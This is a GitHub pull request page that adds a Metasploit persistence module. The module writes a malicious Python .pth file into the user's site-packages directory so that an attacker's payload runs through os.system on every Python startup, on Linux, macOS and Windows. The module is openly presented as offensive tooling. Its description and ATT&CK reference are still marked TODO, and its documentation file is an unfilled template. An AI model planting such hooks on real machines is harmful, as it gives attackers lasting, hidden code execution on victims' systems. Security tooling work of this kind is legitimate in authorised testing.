Skip to content

Adds module for python site-specific hook persistence #20692

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
wants to merge 9 commits into
base: master
Choose a base branch
from
+209 −1
Open

Adds module for python site-specific hook persistence #20692

Show file tree
Hide file tree
Changes from 5 commits
Commits
Show all changes
9 commits
Select commit Hold shift + click to select a range
2f361af
Module init
msutovsky-r7 Nov 10, 2025
5468569
Enhances payload delivery, adds docs base
msutovsky-r7 Nov 11, 2025
7ac1fd9
Adds support for Windows
msutovsky-r7 Nov 11, 2025
d238b46
Adds Python version extraction for Windows
msutovsky-r7 Nov 11, 2025
81abe9d
Cleans up code
msutovsky-r7 Nov 11, 2025
92c2f25
Adds option for user-specified path
msutovsky-r7 Nov 17, 2025
1241cb7
Adds MITRE reference, adds additional datastore options, code cleanup
msutovsky-r7 Nov 19, 2025
ec8906b
Adds docs
msutovsky-r7 Nov 19, 2025
197dbf9
Fixes Windows persistence
msutovsky-r7 Nov 19, 2025
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
44 changes: 44 additions & 0 deletions documentation/modules/exploit/multi/persistence/python_site_specific_hook.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,44 @@
The following is the recommended format for module documentation. But feel free to add more content/sections to this.
One of the general ideas behind these documents is to help someone troubleshoot the module if it were to stop
functioning in 5+ years, so giving links or specific examples can be VERY helpful.

## Vulnerable Application

Instructions to get the vulnerable application. If applicable, include links to the vulnerable install
files, as well as instructions on installing/configuring the environment if it is different than a
standard install. Much of this will come from the PR, and can be copy/pasted.

## Verification Steps
Example steps in this format (is also in the PR):

1. Install the application
1. Start msfconsole
1. Do: `use [module path]`
1. Do: `run`
1. You should get a shell.

## Options
List each option and how to use it.

### Option Name

Talk about what it does, and how to use it appropriately. If the default value is likely to change, include the default value here.

## Scenarios
Specific demo of using the module that might be useful in a real world scenario.

### Version and OS

```
code or console output
```

For example:

To do this specific thing, here's how you do it:

```
msf > use module_name
msf auxiliary(module_name) > set POWERLEVEL >9000
msf auxiliary(module_name) > exploit
```
89 changes: 89 additions & 0 deletions modules/exploits/multi/persistence/python_site_specific_hook.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,89 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking # https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html

include Msf::Post::Linux::Priv
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
include Msf::Exploit::Local::Persistence
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Python Site-Specific Hook Persistence',
'Description' => %q{
TODO
},
'License' => MSF_LICENSE,
'Author' => [
'msutovsky-r7', # msf module
],
'Platform' => ['linux', 'windows', 'osx'],
'Arch' => [ ARCH_CMD ],
'SessionTypes' => [ 'meterpreter', 'shell' ],
'Targets' => [[ 'Auto', {} ]],
'References' => [
[ 'URL', 'https://docs.python.org/3/library/site.html'],
# TODO
['ATT&CK', Mitre::Attack::Technique::T1547_013_XDG_AUTOSTART_ENTRIES], # https://github.com/rapid7/metasploit-framework/pull/20289
],
# TODO
'DisclosureDate' => '2023-11-29',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS]
}
)
)
end

def get_hooks_path
case session.platform
when 'windows', 'win'
@hooks_path = "C:/Python#{@python_version.sub('.', '')}/Lib/site-packages/"
when 'osx', 'linux'
@hooks_path = expand_path("$HOME/.local/lib/python#{@python_version}/site-packages/")
end
end

def get_python_version
case session.platform
when 'windows', 'win'
cmd_exec('cmd.exe', '/c python3.exe --version 2> nul || python2.exe --version 2> nul|| python.exe --version 2> nul') =~ /(\d+.\d+).\d+/
when 'osx', 'linux'
cmd_exec('python3 --version 2>/dev/null || python2 --version 2> /dev/null || python --version 2>/dev/null') =~ /(\d+.\d+).\d+/
end

@python_version = Regexp.last_match(1)
end

def check
get_python_version

return CheckCode::Safe('Python not present on the system') unless @python_version

CheckCode::Vulnerable('Python is present on the system')
end

def install_persistence
get_python_version unless @python_version
get_hooks_path unless @hooks_path

file_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(5..10)

if session.platform == 'osx' || session.platform == 'linux'
cmd_exec("mkdir -p #{@hooks_path}")
end

fail_with(Failure::PayloadFailed, 'Failed to create malicious hook') unless write_file("#{@hooks_path}#{file_name}.pth", %(import os;os.system("#{payload.encoded}") ))
end
end